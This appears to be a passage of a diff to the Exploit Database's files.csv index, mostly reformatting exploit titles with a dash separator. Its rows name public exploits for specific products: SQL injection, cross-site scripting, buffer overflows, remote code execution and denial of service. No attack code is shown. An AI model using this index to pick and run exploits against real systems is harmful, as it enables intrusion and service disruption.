Osman",hardware,webapps,0 @@ -33828,11 +33823,11 @@ id,file,description,date,author,platform,type,port 37473,platforms/php/webapps/37473.txt,"Joomla 2.5.x - Language Switcher ModuleMultiple Cross-Site Scripting Vulnerabilities",2012-07-02,"Stefan Schurtz",php,webapps,0 37474,platforms/php/webapps/37474.txt,"CuteNews 2.0.3 - Arbitrary File Upload",2015-07-03,T0x!c,php,webapps,80 37498,platforms/php/webapps/37498.txt,"Kajona - 'getAllPassedParams()' Function Multiple Cross-Site Scripting Vulnerabilities",2012-07-11,"High-Tech Bridge SA",php,webapps,0 -37476,platforms/php/webapps/37476.txt,"php MBB Cross-Site Scripting and SQL Injection",2012-07-03,TheCyberNuxbie,php,webapps,0 -37477,platforms/linux/dos/37477.txt,"gnome-terminal (vte) VteTerminal Escape Sequence Parsing Remote DoS",2012-07-03,"Kevin Fenzi",linux,dos,0 +37476,platforms/php/webapps/37476.txt,"php MBB - Cross-Site Scripting / SQL Injection",2012-07-03,TheCyberNuxbie,php,webapps,0 +37477,platforms/linux/dos/37477.txt,"gnome-terminal (vte) VteTerminal - Escape Sequence Parsing Remote DoS",2012-07-03,"Kevin Fenzi",linux,dos,0 37478,platforms/multiple/dos/37478.txt,"plow - '.plowrc' File Buffer Overflow",2012-07-03,"Jean Pascal Pereira",multiple,dos,0 37479,platforms/php/webapps/37479.txt,"Classified Ads Script PHP - 'admin.php' Multiple SQL Injection",2012-07-04,snup,php,webapps,0 -37480,platforms/windows/dos/37480.pl,"Solar FTP Server Denial of Service",2012-07-05,coolkaveh,windows,dos,0 +37480,platforms/windows/dos/37480.pl,"Solar FTP Server - Denial of Service",2012-07-05,coolkaveh,windows,dos,0 37481,platforms/php/webapps/37481.txt,"WordPress SocialFit Plugin - 'msg' Parameter Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0 37482,platforms/php/webapps/37482.txt,"WordPress custom tables Plugin - 'key' Parameter Cross-Site Scripting",2012-07-03,"Sammy FORGIT",php,webapps,0 37483,platforms/php/webapps/37483.txt,"WordPress church_admin Plugin - 'id' parameter Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0 @@ -33852,7 +33847,7 @@ id,file,description,date,author,platform,type,port 37500,platforms/php/webapps/37500.txt,"Funeral Script PHP - Cross-Site Scripting / SQL Injection",2012-06-17,snup,php,webapps,0 37501,platforms/php/webapps/37501.rb,"WordPress Generic Plugin - Arbitrary File Upload",2012-07-13,KedAns-Dz,php,webapps,0 37502,platforms/php/webapps/37502.txt,"Elite Bulletin Board - Multiple SQL Injection",2012-07-15,ToXiC,php,webapps,0 -37503,platforms/php/webapps/37503.txt,"Event Calender PHP Multiple Input Validation Vulnerabilities",2012-07-16,snup,php,webapps,0 +37503,platforms/php/webapps/37503.txt,"Event Calender PHP - Multiple Input Validation Vulnerabilities",2012-07-16,snup,php,webapps,0 37504,platforms/android/webapps/37504.py,"AirDroid - Unauthenticated Arbitrary File Upload",2015-07-06,"Parsa Adib",android,webapps,8888 37505,platforms/php/webapps/37505.txt,"Simple Machines 2.0.2 - Multiple HTML Injection Vulnerabilities",2012-07-16,"Benjamin Kunz Mejri",php,webapps,0 37506,platforms/php/webapps/37506.php,"WordPress Post Recommendations Plugin - 'abspath' Parameter Remote File Inclusion",2012-07-16,"Sammy FORGIT",php,webapps,0 @@ -33874,9 +33869,9 @@ id,file,description,date,author,platform,type,port 37522,platforms/php/webapps/37522.txt,"WordPress chenpress Plugin - Arbitrary File Upload",2012-07-21,Am!r,php,webapps,0 37523,platforms/multiple/remote/37523.rb,"Adobe Flash Player - ByteArray Use-After-Free",2015-07-08,Metasploit,multiple,remote,0 37524,platforms/hardware/webapps/37524.txt,"Cradlepoint MBR1400 and MBR1200 - Local File Inclusion",2015-07-08,Doc_Hak,hardware,webapps,80 -37525,platforms/windows/dos/37525.c,"Symantec Endpoint Protection 12.1.4013 Service Disabling",2015-07-08,hyp3rlinx,windows,dos,0 +37525,platforms/windows/dos/37525.c,"Symantec Endpoint Protection 12.1.4013 - Service Disabling",2015-07-08,hyp3rlinx,windows,dos,0 37526,platforms/windows/dos/37526.txt,"Immunity Debugger 1.85 - Crash PoC",2015-07-08,Arsyntex,windows,dos,0 -37527,platforms/hardware/webapps/37527.txt,"AirLink101 SkyIPCam1620W OS Command Injection",2015-07-08,"Core Security",hardware,webapps,0 +37527,platforms/hardware/webapps/37527.txt,"AirLink101 SkyIPCam1620W - OS Command Injection",2015-07-08,"Core Security",hardware,webapps,0 37528,platforms/php/webapps/37528.txt,"Centreon 2.5.4 - Multiple Vulnerabilities",2015-07-08,"Huy-Ngoc DAU",php,webapps,80 37621,platforms/windows/webapps/37621.txt,"Kaseya Virtual System Administrator - Multiple Vulnerabilities (1)",2015-07-15,"Pedro Ribeiro",windows,webapps,0 37530,platforms/php/webapps/37530.txt,"WordPress WP e-Commerce Shop Styling Plugin 2.5 - Arbitrary File Download",2015-07-08,"Larry W. Cashdollar",php,webapps,80 @@ -33884,7 +33879,7 @@ id,file,description,date,author,platform,type,port 37532,platforms/hardware/webapps/37532.txt,"AirLive Multiple Products - OS Command Injection",2015-07-08,"Core Security",hardware,webapps,8080 37533,platforms/asp/webapps/37533.txt,"Orchard CMS 1.7.3/1.8.2/1.9.0 - Stored XSS",2015-07-08,"Paris Zoumpouloglou",asp,webapps,80 37536,platforms/multiple/remote/37536.rb,"Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow",2015-07-08,Metasploit,multiple,remote,0 -37537,platforms/php/webapps/37537.txt,"phpProfiles Multiple Security Vulnerabilities",2012-07-24,L0n3ly-H34rT,php,webapps,0 +37537,platforms/php/webapps/37537.txt,"phpProfiles - Multiple Security Vulnerabilities",2012-07-24,L0n3ly-H34rT,php,webapps,0 37538,platforms/linux/dos/37538.py,"ISC DHCP 4.x - Multiple Denial of Service Vulnerabilities",2012-07-25,"Markus Hietava",linux,dos,0 37539,platforms/php/webapps/37539.txt,"REDAXO - 'subpage' Parameter Cross-Site Scripting",2012-07-25,"High-Tech Bridge SA",php,webapps,0 37540,platforms/php/webapps/37540.txt,"Joomla Odudeprofile component - 'profession' Parameter SQL Injection",2012-07-25,"Daniel Barragan",php,webapps,0 @@ -33906,7 +33901,7 @@ id,file,description,date,author,platform,type,port 37558,platforms/windows/dos/37558.txt,"Notepad++ 6.7.3 - Crash PoC",2015-07-10,"Rahul Pratap Singh",windows,dos,0 37559,platforms/php/webapps/37559.txt,"WordPress CP Image Store with Slideshow Plugin 1.0.5 - Arbitrary File Download",2015-07-10,"i0akiN SEC-LABORATORY",php,webapps,0 37560,platforms/php/webapps/37560.txt,"WordPress CP Multi View Event Calendar Plugin 1.1.7 - SQL Injection",2015-07-10,"i0akiN SEC-LABORATORY",php,webapps,0 -37562,platforms/multiple/dos/37562.pl,"NTPD MON_GETLIST Query Amplification Denial of Service",2015-07-10,"Todor Donev",multiple,dos,123 +37562,platforms/multiple/dos/37562.pl,"NTPD - MON_GETLIST Query Amplification Denial of Service",2015-07-10,"Todor Donev",multiple,dos,123 37567,platforms/php/webapps/37567.txt,"tekno.Portal 0.1b - 'link.php' SQL Injection",2012-08-01,Socket_0x03,php,webapps,0 37568,platforms/windows/dos/37568.pl,"VLC Media Player - '.3gp' File Divide-By-Zero Denial of Service",2012-08-02,Dark-Puzzle,windows,dos,0 37569,platforms/multiple/webapps/37569.txt,"ntop - 'arbfile' Parameter Cross-Site Scripting",2012-08-03,"Marcos Garcia",multiple,webapps,0 @@ -33915,7 +33910,7 @@ id,file,description,date,author,platform,type,port 37572,platforms/php/webapps/37572.txt,"Elefant CMS - 'id' Parameter Cross-Site Scripting",2012-08-03,PuN!Sh3r,php,webapps,0 37573,platforms/multiple/webapps/37573.txt,"Worksforweb iAuto - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-08-06,"Benjamin Kunz Mejri",multiple,webapps,0 37575,platforms/php/webapps/37575.txt,"Joomla! 'com_photo' module - Multiple SQL Injection",2012-08-06,"Chokri Ben Achor",php,webapps,0 -37576,platforms/linux/remote/37576.cpp,"Alligra Calligra Heap Based Buffer Overflow",2012-08-07,"Charlie Miller",linux,remote,0 +37576,platforms/linux/remote/37576.cpp,"Alligra Calligra - Heap Based Buffer Overflow",2012-08-07,"Charlie Miller",linux,remote,0 37577,platforms/asp/webapps/37577.txt,"PolarisCMS - 'WebForm_OnSubmit()' Function Cross-Site Scripting",2012-08-05,"Gjoko Krstic",asp,webapps,0 37578,platforms/php/webapps/37578.txt,"Open Constructor - users/users.php keyword Parameter XSS",2012-08-04,"Lorenzo Cantoni",php,webapps,0 37579,platforms/php/webapps/37579.txt,"Open Constructor - data/file/edit.php result Parameter XSS",2012-08-04,"Lorenzo Cantoni",php,webapps,0 @@ -33925,7 +33920,7 @@ id,file,description,date,author,platform,type,port 37583,platforms/php/webapps/37583.txt,"YT-Videos Script - 'id' Parameter SQL Injection",2012-08-06,3spi0n,php,webapps,0 37584,platforms/php/webapps/37584.txt,"TCExam 11.2.x - /admin/code/tce_edit_answer.php Multiple Parameter SQL Injection",2012-08-07,"Chris Cooper",php,webapps,0 37585,platforms/php/webapps/37585.txt,"TCExam 11.2.x - /admin/code/tce_edit_question.php subject_module_id Parameter SQL Injection",2012-08-07,"Chris Cooper",php,webapps,0 -37586,platforms/php/webapps/37586.php,"PBBoard Authentication Bypass",2012-08-07,i-Hmx,php,webapps,0 +37586,platforms/php/webapps/37586.php,"PBBoard - Authentication Bypass",2012-08-07,i-Hmx,php,webapps,0 37587,platforms/php/webapps/37587.txt,"GetSimple - 'path' Parameter Local File Inclusion",2012-08-07,PuN!Sh3r,php,webapps,0 37588,platforms/php/webapps/37588.txt,"phpSQLiteCMS - Multiple Vulnerabilities",2015-07-13,hyp3rlinx,php,webapps,80 37589,platforms/java/webapps/37589.txt,"ConcourseSuite - Multiple Cross-Site Scripting and Cross-Site Request Forgery Vulnerabilities",2012-08-08,"Matthew Joyce",java,webapps,0 @@ -33965,8 +33960,8 @@ id,file,description,date,author,platform,type,port 37628,platforms/hardware/remote/37628.rb,"D-Link - Cookie Command Execution",2015-07-17,Metasploit,hardware,remote,0 37629,platforms/php/webapps/37629.txt,"WordPress BuddyPress Activity Plus Plugin 1.5 - CSRF",2015-07-17,"Tom Adams",php,webapps,80 37630,platforms/php/webapps/37630.txt,"Hotel Booking Portal 0.1 - Multiple SQL Injection / Cross-Site Scripting",2012-08-09,"Yakir Wizman",php,webapps,0 -37631,platforms/linux/local/37631.c,"GNU glibc Multiple Local Stack Buffer Overflow Vulnerabilities",2012-08-13,"Joseph S. Myer",linux,local,0 -37632,platforms/php/webapps/37632.txt,"Total Shop UK eCommerce CodeIgniter Multiple Cross-Site Scripting Vulnerabilities",2012-08-13,"Chris Cooper",php,webapps,0 +37631,platforms/linux/local/37631.c,"GNU glibc - Multiple Local Stack Buffer Overflow Vulnerabilities",2012-08-13,"Joseph S. Myer",linux,local,0 +37632,platforms/php/webapps/37632.txt,"Total Shop UK eCommerce CodeIgniter - Multiple Cross-Site Scripting Vulnerabilities",2012-08-13,"Chris Cooper",php,webapps,0 37633,platforms/php/webapps/37633.txt,"mIRC - 'projects.php' Cross-Site Scripting",2012-08-10,TayfunBasoglu,php,webapps,0 37634,platforms/php/webapps/37634.txt,"MindTouch DekiWiki - Multiple Remote File Inclusion / Local File Inclusion",2012-08-11,L0n3ly-H34rT,php,webapps,0 37635,platforms/php/webapps/37635.txt,"GalaxyScripts Mini File Host and DaddyScripts Daddy's File Host - Local File Inclusion",2012-08-10,L0n3ly-H34rT,php,webapps,0 @@ -33974,14 +33969,14 @@ id,file,description,date,author,platform,type,port 37637,platforms/php/webapps/37637.pl,"Elastix 2.2.0 - 'graph.php' Local File Inclusion",2012-08-17,cheki,php,webapps,0 37638,platforms/cgi/webapps/37638.txt,"LISTSERV 16 - 'SHOWTPL' Parameter Cross-Site Scripting",2012-08-17,"Jose Carlos de Arriba",cgi,webapps,0 37639,platforms/multiple/dos/37639.html,"Mozilla Firefox - Remote Denial of Service",2012-08-17,"Jean Pascal Pereira",multiple,dos,0 -37640,platforms/windows/dos/37640.pl,"Divx Player Denial of Service",2012-08-20,Dark-Puzzle,windows,dos,0 +37640,platforms/windows/dos/37640.pl,"Divx Player - Denial of Service",2012-08-20,Dark-Puzzle,windows,dos,0 37641,platforms/php/webapps/37641.txt,"JPM Article Blog Script 6 - 'tid' Parameter Cross-Site Scripting",2012-08-21,Mr.0c3aN,php,webapps,0 37642,platforms/php/webapps/37642.txt,"SaltOS - 'download.php' Cross-Site Scripting",2012-08-18,"Stefan Schurtz",php,webapps,0 37643,platforms/php/webapps/37643.txt,"IBM Rational ClearQuest 8.0 - Multiple Security Vulnerabilities",2012-08-27,anonymous,php,webapps,0 37644,platforms/php/webapps/37644.txt,"Jara 1.6 - Multiple SQL Injection / Multiple Cross-Site Scripting Vulnerabilities",2012-08-22,"Canberk BOLAT",php,webapps,0 37645,platforms/php/webapps/37645.txt,"OrderSys 1.6.4 - Multiple SQL Injection / Multiple Cross-Site Scripting Vulnerabilities",2012-08-22,"Canberk BOLAT",php,webapps,0 37646,platforms/php/webapps/37646.txt,"Banana Dance - Cross-Site Scripting / SQL Injection",2012-08-22,"Canberk BOLAT",php,webapps,0 -37647,platforms/multiple/remote/37647.txt,"Apache Struts2 Skill Name Remote Code Execution",2012-08-23,kxlzx,multiple,remote,0 +37647,platforms/multiple/remote/37647.txt,"Apache Struts2 - Skill Name Remote Code Execution",2012-08-23,kxlzx,multiple,remote,0 37648,platforms/php/webapps/37648.txt,"Joomla! CiviCRM Component - Multiple Arbitrary File Upload Vulnerabilities",2012-08-22,Crim3R,php,webapps,0 37649,platforms/php/webapps/37649.html,"SiNG cms - 'password.php' Cross-Site Scripting",2012-08-23,LiquidWorm,php,webapps,0 37650,platforms/php/webapps/37650.txt,"1024 CMS 2.1.1 - 'p' Parameter SQL Injection",2012-08-22,kallimero,php,webapps,0 @@ -33993,24 +33988,24 @@ id,file,description,date,author,platform,type,port 37656,platforms/php/webapps/37656.txt,"PHP Web Scripts Ad Manager Pro - 'page' Parameter Local File Inclusion",2012-08-23,"Corrado Liotta",php,webapps,0 37657,platforms/windows/local/37657.txt,"Microsoft Word - Local Machine Zone Remote Code Execution",2015-07-20,"Eduardo Braun Prado",windows,local,0 37688,platforms/php/remote/37688.txt,"PHP - 'header()' HTTP Header Injection",2011-10-06,"Mr. Tokumaru",php,remote,0 -37659,platforms/php/webapps/37659.txt,"phpVibe < 4.20 Stored XSS",2015-07-20,"Filippos Mastrogiannis",php,webapps,0 +37659,platforms/php/webapps/37659.txt,"phpVibe < 4.20 - Stored XSS",2015-07-20,"Filippos Mastrogiannis",php,webapps,0 37660,platforms/ios/dos/37660.txt,"Image Transfer IOS - Remote Crash Proof Of Concept",2015-07-20,"Mohammad Reza Espargham",ios,dos,0 37662,platforms/multiple/webapps/37662.txt,"Airdroid iOS / Android / Win 3.1.3 - Persistent",2015-07-20,Vulnerability-Lab,multiple,webapps,0 -37663,platforms/linux/dos/37663.txt,"TcpDump rpki_rtr_pdu_print Out-of-Bounds Denial of Service",2015-07-20,"Luke Arntson",linux,dos,0 +37663,platforms/linux/dos/37663.txt,"TcpDump - rpki_rtr_pdu_print Out-of-Bounds Denial of Service",2015-07-20,"Luke Arntson",linux,dos,0 37666,platforms/php/webapps/37666.txt,"Joomla! Helpdesk Pro Plugin < 1.4.0 - Multiple Vulnerabilities",2015-07-21,"Simon Rawet",php,webapps,80 37667,platforms/java/remote/37667.rb,"SysAid Help Desk 'rdslogs' - Arbitrary File Upload",2015-07-21,Metasploit,java,remote,0 37668,platforms/windows/remote/37668.php,"Internet Download Manager - OLE Automation Array Remote Code Execution",2015-07-21,"Mohammad Reza Espargham",windows,remote,0 37669,platforms/windows/dos/37669.pl,"Counter-Strike 1.6 - 'GameInfo' Query Reflection DoS PoC",2015-07-22,"Todor Donev",windows,dos,0 37670,platforms/osx/local/37670.sh,"OS X 10.10 - DYLD_PRINT_TO_FILE Local Privilege Escalation",2015-07-22,"Stefan Esser",osx,local,0 -37671,platforms/multiple/remote/37671.txt,"Websense Content Gateway Multiple Cross-Site Scripting Vulnerabilities",2012-08-23,"Steven Sim Kok Leong",multiple,remote,0 +37671,platforms/multiple/remote/37671.txt,"Websense Content Gateway - Multiple Cross-Site Scripting Vulnerabilities",2012-08-23,"Steven Sim Kok Leong",multiple,remote,0 37672,platforms/php/webapps/37672.txt,"JW Player - 'logo.link' Parameter Cross-Site Scripting",2012-08-29,MustLive,php,webapps,0 37673,platforms/windows/dos/37673.html,"Microsoft Indexing Service - 'ixsso.dll' ActiveX Control Denial of Service",2012-08-24,coolkaveh,windows,dos,0 37674,platforms/php/webapps/37674.txt,"PHP Web Scripts Text Exchange Pro - 'page' Parameter Local File Inclusion",2012-08-24,"Yakir Wizman",php,webapps,0 37675,platforms/php/webapps/37675.txt,"Joomla! Komento Component - 'cid' Parameter SQL Injection",2012-08-27,Crim3R,php,webapps,0 -37676,platforms/asp/webapps/37676.txt,"Power-eCommerce Multiple Cross-Site Scripting Vulnerabilities",2012-08-25,Crim3R,asp,webapps,0 +37676,platforms/asp/webapps/37676.txt,"Power-eCommerce - Multiple Cross-Site Scripting Vulnerabilities",2012-08-25,Crim3R,asp,webapps,0 37677,platforms/php/webapps/37677.txt,"WordPress Finder Plugin - 'order' Parameter Cross-Site Scripting",2012-08-25,Crim3R,php,webapps,0 37678,platforms/asp/webapps/37678.txt,"Web Wiz Forums - Multiple Cross-Site Scripting Vulnerabilities",2012-08-25,Crim3R,asp,webapps,0 -37679,platforms/php/webapps/37679.txt,"LibGuides Multiple Cross-Site Scripting Vulnerabilities",2012-08-25,Crim3R,php,webapps,0 +37679,platforms/php/webapps/37679.txt,"LibGuides - Multiple Cross-Site Scripting Vulnerabilities",2012-08-25,Crim3R,php,webapps,0 37680,platforms/php/webapps/37680.txt,"Mihalism Multi Host - 'users.php' Cross-Site Scripting",2012-08-25,Explo!ter,php,webapps,0 37681,platforms/php/webapps/37681.txt,"WordPress Cloudsafe365 Plugin - 'file' Parameter Remote File Disclosure",2012-08-28,"Jan Van Niekerk",php,webapps,0 37682,platforms/php/webapps/37682.txt,"WordPress Simple:Press Forum Plugin - Arbitrary File Upload",2012-08-28,"Iranian Dark Coders",php,webapps,0 @@ -34021,7 +34016,7 @@ id,file,description,date,author,platform,type,port 37687,platforms/php/webapps/37687.txt,"TomatoCart - 'example_form.ajax.php' Cross-Site Scripting",2012-08-30,HauntIT,php,webapps,0 37689,platforms/asp/webapps/37689.txt,"XM Forum - 'search.asp' SQL Injection",2012-08-30,Crim3R,asp,webapps,0 37690,platforms/php/webapps/37690.txt,"Crowbar - 'file' Parameter Multiple Cross-Site Scripting Vulnerabilities",2012-08-30,"Matthias Weckbecker",php,webapps,0 -37691,platforms/php/webapps/37691.txt,"SugarCRM Community Edition Multiple Information Disclosure Vulnerabilities",2012-08-31,"Brendan Coles",php,webapps,0 +37691,platforms/php/webapps/37691.txt,"SugarCRM Community Edition - Multiple Information Disclosure Vulnerabilities",2012-08-31,"Brendan Coles",php,webapps,0 37692,platforms/multiple/dos/37692.pl,"aMSN - Remote Denial of Service",2006-01-01,"Braulio Miguel Suarez Urquijo",multiple,dos,0 37693,platforms/php/webapps/37693.txt,"Sitemax Maestro - SQL Injection / Local File Inclusion",2012-09-03,AkaStep,php,webapps,0 37694,platforms/php/webapps/37694.txt,"Wiki Web Help - 'configpath' Parameter Remote File Inclusion",2012-08-04,L0n3ly-H34rT,php,webapps,0 @@ -34117,14 +34112,14 @@ id,file,description,date,author,platform,type,port 37785,platforms/php/webapps/37785.txt,"VICIDIAL Call Center Suite - Multiple SQL Injection",2012-09-10,"Sepahan TelCom IT Group",php,webapps,0 37786,platforms/php/webapps/37786.txt,"DeltaScripts PHP Links - Multiple SQL Injection",2012-09-10,L0n3ly-H34rT,php,webapps,0 37787,platforms/php/webapps/37787.txt,"WordPress Download Monitor Plugin - 'dlsearch' Parameter Cross-Site Scripting",2012-08-30,"Chris Cooper",php,webapps,0 -37788,platforms/linux/remote/37788.py,"libguac Remote Buffer Overflow",2012-09-11,"Michael Jumper",linux,remote,0 +37788,platforms/linux/remote/37788.py,"libguac - Remote Buffer Overflow",2012-09-11,"Michael Jumper",linux,remote,0 37789,platforms/php/webapps/37789.txt,"Openfiler 2.3 - Multiple Cross-Site Scripting and Information Disclosure Vulnerabilities",2012-09-06,"Brendan Coles",php,webapps,0 37790,platforms/php/webapps/37790.txt,"FBDj - 'id' Parameter SQL Injection",2012-09-11,"TUNISIAN CYBER",php,webapps,0 37791,platforms/multiple/webapps/37791.txt,"Atlassian Confluence 3.4.x - Error Page Cross-Site Scripting",2012-09-12,"D. Niedermaier",multiple,webapps,0 -37792,platforms/android/remote/37792.txt,"Google Chrome for Android com.android.browser.application_id Intent Extra Data XSS",2012-09-12,"Artem Chaykin",android,remote,0 -37793,platforms/android/remote/37793.txt,"Google Chrome for Android Multiple file:: URL Handler Local Downloaded Content Disclosure",2012-09-12,"Artem Chaykin",android,remote,0 -37794,platforms/android/remote/37794.txt,"Google Chrome for Android Local Application Handling Cookie Theft Weakness",2012-09-12,"Artem Chaykin",android,remote,0 -37795,platforms/android/remote/37795.txt,"Google Chrome for Android Same-origin Policy Bypass Local Symlink Weakness",2012-09-12,"Artem Chaykin",android,remote,0 +37792,platforms/android/remote/37792.txt,"Google Chrome for Android - com.android.browser.application_id Intent Extra Data XSS",2012-09-12,"Artem Chaykin",android,remote,0 +37793,platforms/android/remote/37793.txt,"Google Chrome for Android - Multiple file:: URL Handler Local Downloaded Content Disclosure",2012-09-12,"Artem Chaykin",android,remote,0 +37794,platforms/android/remote/37794.txt,"Google Chrome for Android - Local Application Handling Cookie Theft Weakness",2012-09-12,"Artem Chaykin",android,remote,0 +37795,platforms/android/remote/37795.txt,"Google Chrome for Android - Same-origin Policy Bypass Local Symlink Weakness",2012-09-12,"Artem Chaykin",android,remote,0 37940,platforms/php/webapps/37940.txt,"SenseSites CommonSense CMS - cat2.php id Parameter SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0 37941,platforms/php/webapps/37941.txt,"SenseSites CommonSense CMS - special.php id Parameter SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0 37942,platforms/php/webapps/37942.txt,"SenseSites CommonSense CMS - article.php id Parameter SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0 @@ -34146,8 +34141,8 @@ id,file,description,date,author,platform,type,port 37808,platforms/windows/remote/37808.py,"Easy File Management Web Server 5.6 - USERID Remote Buffer Overflow",2015-08-18,"Tracy Turben",windows,remote,0 37809,platforms/php/webapps/37809.php,"Nuts CMS - Remote PHP Code Injection / Execution",2015-08-17,"Yakir Wizman",php,webapps,80 37810,platforms/windows/dos/37810.txt,"FTP Commander 8.02 - SEH Overwrite",2015-08-18,Un_N0n,windows,dos,0 -37811,platforms/php/webapps/37811.py,"Magento CE < 1.9.0.1 - Post Auth RCE",2015-08-18,Ebrietas0,php,webapps,80 -37812,platforms/win_x86/remote/37812.rb,"Symantec Endpoint Protection Manager Authentication Bypass and Code Execution",2015-08-18,Metasploit,win_x86,remote,8443 +37811,platforms/php/webapps/37811.py,"Magento CE < 1.9.0.1 - Post-Auth RCE",2015-08-18,Ebrietas0,php,webapps,80 +37812,platforms/win_x86/remote/37812.rb,"Symantec Endpoint Protection Manager - Authentication Bypass and Code Execution",2015-08-18,Metasploit,win_x86,remote,8443 37813,platforms/windows/local/37813.rb,"VideoCharge Studio - Buffer Overflow (SEH)",2015-08-18,Metasploit,windows,local,0 37814,platforms/python/remote/37814.rb,"Werkzeug - Debug Shell Command Execution",2015-08-18,Metasploit,python,remote,0 37817,platforms/php/webapps/37817.txt,"PHPfileNavigator 2.3.3 - XSS",2015-08-18,hyp3rlinx,php,webapps,80 @@ -34159,7 +34154,7 @@ id,file,description,date,author,platform,type,port 37827,platforms/php/webapps/37827.txt,"WordPress Purity Theme - Multiple Cross-Site Scripting Vulnerabilities",2012-09-07,"Matan Azugi",php,webapps,0 37828,platforms/php/webapps/37828.txt,"Poweradmin - 'index.php' Cross-Site Scripting",2012-09-20,Siavash,php,webapps,0 37829,platforms/php/webapps/37829.txt,"WordPress MF Gig Calendar Plugin - Cross-Site Scripting",2012-09-20,"Chris Cooper",php,webapps,0 -37830,platforms/cgi/webapps/37830.txt,"ZEN Load Balancer Multiple Security Vulnerabilities",2012-09-24,"Brendan Coles",cgi,webapps,0 +37830,platforms/cgi/webapps/37830.txt,"ZEN Load Balancer - Multiple Security Vulnerabilities",2012-09-24,"Brendan Coles",cgi,webapps,0 37937,platforms/linux/local/37937.c,"Linux Kernel 3.2.x - 'uname()' System Call Local Information Disclosure",2012-10-09,"Brad Spengler",linux,local,0 37938,platforms/php/webapps/37938.txt,"OpenX - /www/admin/plugin-index.php parent Parameter XSS",2012-10-10,"High-Tech Bridge",php,webapps,0 37939,platforms/php/webapps/37939.txt,"FileContral - Local File Inclusion / Local File Disclosure",2012-08-11,"Ashiyane Digital Security Team",php,webapps,0 @@ -34175,9 +34170,9 @@ id,file,description,date,author,platform,type,port 37840,platforms/windows/remote/37840.txt,"Flash Broker-Based Sandbox Escape via Forward Slash Instead of Backslash",2015-08-19,KeenTeam,windows,remote,0 37841,platforms/windows/remote/37841.txt,"Flash Broker-Based Sandbox Escape via Unexpected Directory Lock",2015-08-19,KeenTeam,windows,remote,0 37842,platforms/windows/remote/37842.txt,"Flash Broker-Based Sandbox Escape via Timing Attack Against File Moving",2015-08-19,KeenTeam,windows,remote,0 -37843,platforms/windows/dos/37843.txt,"Flash Player Integer Overflow in Function.apply",2015-08-19,"Google Security Research",windows,dos,0 +37843,platforms/windows/dos/37843.txt,"Flash Player - Integer Overflow in Function.apply",2015-08-19,"Google Security Research",windows,dos,0 37844,platforms/windows/dos/37844.txt,"Adobe Flash - AVSS.setSubscribedTags Use-After-Free Memory Corruption",2015-08-19,"Google Security Research",windows,dos,0 -37845,platforms/windows/dos/37845.txt,"Flash Uninitialized Stack Variable MPD Parsing Memory Corruption",2015-08-19,bilou,windows,dos,0 +37845,platforms/windows/dos/37845.txt,"Flash - Uninitialized Stack Variable MPD Parsing Memory Corruption",2015-08-19,bilou,windows,dos,0 37846,platforms/windows/dos/37846.txt,"Flash Issues in DefineBitsLossless and DefineBitsLossless2 Leads to Using Uninitialized Memory",2015-08-19,bilou,windows,dos,0 37847,platforms/windows/dos/37847.txt,"Adobe Flash AS2 - TextField.filters Use-After-Free",2015-08-19,bilou,windows,dos,0 37848,platforms/windows/dos/37848.txt,"Adobe Flash AS2 - TextField.filters Use-After-Free",2015-08-19,bilou,windows,dos,0 @@ -34231,7 +34226,7 @@ id,file,description,date,author,platform,type,port 37896,platforms/php/webapps/37896.txt,"WordPress ABC Test Plugin - 'id' Parameter Cross-Site Scripting",2012-09-26,"Scott Herbert",php,webapps,0 37897,platforms/linux/dos/37897.html,"Midori Browser 0.3.2 - Denial of Service",2012-09-27,"Ryuzaki Lawlet",linux,dos,0 37898,platforms/linux/local/37898.py,"Reaver Pro - Local Privilege Escalation",2012-09-30,infodox,linux,local,0 -37899,platforms/php/webapps/37899.txt,"Switchvox Multiple HTML Injection Vulnerabilities",2012-10-02,"Ibrahim El-Sayed",php,webapps,0 +37899,platforms/php/webapps/37899.txt,"Switchvox - Multiple HTML Injection Vulnerabilities",2012-10-02,"Ibrahim El-Sayed",php,webapps,0 37900,platforms/multiple/remote/37900.txt,"IBM Lotus Notes Traveler 8.5.1.x - Multiple Input Validation Vulnerabilities",2012-09-28,MustLive,multiple,remote,0 37901,platforms/php/webapps/37901.txt,"AlamFifa CMS - 'user_name_cookie' Parameter SQL Injection",2012-09-30,L0n3ly-H34rT,php,webapps,0 37902,platforms/php/webapps/37902.php,"WordPress Akismet Plugin - Multiple Cross-Site Scripting Vulnerabilities",2012-10-01,"Tapco Security",php,webapps,0 @@ -34257,7 +34252,7 @@ id,file,description,date,author,platform,type,port 37922,platforms/windows/dos/37922.txt,"Windows ATMFD.DLL CFF table (ATMFD+0x34072 - / ATMFD+0x3407b) Invalid Memory Access",2015-08-21,"Google Security Research",windows,dos,0 37923,platforms/windows/dos/37923.txt,"Windows - ATMFD.DLL CharString Stream Out-of-Bounds Reads",2015-08-21,"Google Security Research",windows,dos,0 37924,platforms/windows/dos/37924.txt,"Microsoft Office 2007 MSPTLS Heap Index Integer Underflow - MS15-081",2015-08-21,"Google Security Research",windows,dos,0 -37925,platforms/windows/local/37925.txt,"Mozilla Maintenance Service Log File Overwrite Elevation of Privilege",2015-08-21,"Google Security Research",windows,local,0 +37925,platforms/windows/local/37925.txt,"Mozilla - Maintenance Service Log File Overwrite Elevation of Privilege",2015-08-21,"Google Security Research",windows,local,0 37926,platforms/php/webapps/37926.txt,"Netsweeper 2.6.29.8 - SQL Injection",2015-08-21,"Anastasios Monachos",php,webapps,0 37927,platforms/php/webapps/37927.txt,"Netsweeper 4.0.4 - SQL Injection",2015-08-21,"Anastasios Monachos",php,webapps,0 37928,platforms/php/webapps/37928.txt,"Netsweeper 4.0.8 - SQL Injection Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0 @@ -34301,7 +34296,7 @@ id,file,description,date,author,platform,type,port 37983,platforms/php/webapps/37983.php,"EasyITSP - 'customers_edit.php' Authentication Security Bypass",2012-10-26,"Michal Blaszczak",php,webapps,0 37984,platforms/windows/dos/37984.pl,"KMPlayer 3.0.0.1440 - '.avi' File Local Denial of Service",2012-10-26,Am!r,windows,dos,0 37985,platforms/windows/remote/37985.py,"FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution",2015-08-27,"Naser Farhadi",windows,remote,80 